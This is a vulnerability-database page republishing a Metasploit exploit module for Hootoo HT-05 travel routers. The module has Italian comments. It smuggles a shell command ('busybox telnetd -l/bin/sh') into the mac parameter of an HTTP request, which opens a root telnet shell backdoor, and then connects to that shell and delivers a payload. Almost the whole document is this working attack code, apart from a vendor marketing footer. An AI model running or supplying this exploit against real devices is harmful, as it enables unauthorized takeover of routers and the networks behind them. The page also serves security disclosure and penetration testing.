Lucene search
K

Hootoo HT-05 Remote Code Execution

🗓️ 15 Jan 2019 00:00:00Reported by Andrei ManoleType 
packetstorm
 packetstorm
🔗 packetstormsecurity.com👁 247 Views

Hootoo HT-05 Remote Code Execution module creating backdoo

Code
`require 'msf/core'  
require 'net/http'  
require "uri"  
  
class MetasploitModule < Msf::Exploit::Remote  
  
include Msf::Exploit::Remote::Tcp  
  
#  
#Descrizione del Exploit  
#  
def initialize(info = {})  
super(update_info(info,  
'Name' => 'Hootoo HT-05 remote shell exploit',  
  
'Description' => %q{  
This module tries to open a door in the device by exploiting the RemoteCodeExecution by creating a backdoor inside the device  
This exploit was written by Andrei Manole. Version of the frimware 2.000.022. Tested on 2.00.0.82 -> it still works  
},  
'Author' => 'Andrei Manole',  
'References' =>  
[  
],  
'Privileged' => true,  
'Platform' => [ 'unix' ],  
'Arch' => ARCH_CMD,  
'Payload' =>  
{  
'Space' => 2000,  
'BadChars' => '',  
'DisableNops' => true,  
'Compat' =>  
{  
'PayloadType' => 'cmd_interact',  
'ConnectionType' => 'find'  
}  
}, #fine del settaggio del payload  
'Targets' =>  
[  
[ 'Automatic', { } ],  
],  
'DisclosureDate' => "20 Dicembre 2018",  
'DefaultTarget' => 0))  
  
register_options([ Opt::RPORT(6666) ], self.class)  
  
end  
  
def send_request(host,port) #funzione di invio  
  
uri = URI.parse("http://#{host}/protocol.csp?function=set&fname=security&opt=mac_table&flag=close_forever&mac=|/bin/busybox%20telnetd%20-l/bin/sh%20-p#{port}")  
http = Net::HTTP.new(uri.host, uri.port)  
  
request = Net::HTTP::Get.new(uri.request_uri)  
response = http.request(request)  
  
if response.code == 200 || response.message == 'OK' || response.class.name == 'HTTPOK' then  
return true  
end  
  
return false  
  
end  
  
def exploit #exploit  
  
print_status("[+] Apertura backdoor in corso...")  
if !send_request(datastore['RHOST'],datastore['RPORT']) then #controllo della funzione di invio , passando i dati scelti dal utenti mediante il datastore[] di msf.  
raise("[-] Errore nel apertura della porta")  
end  
print_good("[+] Richiesta inviata con successo! :)")  
nsock = self.connect(false, {"RPORT" => datastore['RPORT']}) rescue nil #inizio a fare la conessione  
print_good("[+] Porta aperta con successo ! :)")  
nsock.put(payload.encoded + " >/dev/null 2>&1") #passo il payload per creare una communicazione con la /bin/sh create sulla porta, ">/dev/null 2>&1" invio Stand Error in un backhole e dopo su 1 -> Standard Out.  
handler(nsock)  
  
return  
end  
  
end  
`

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation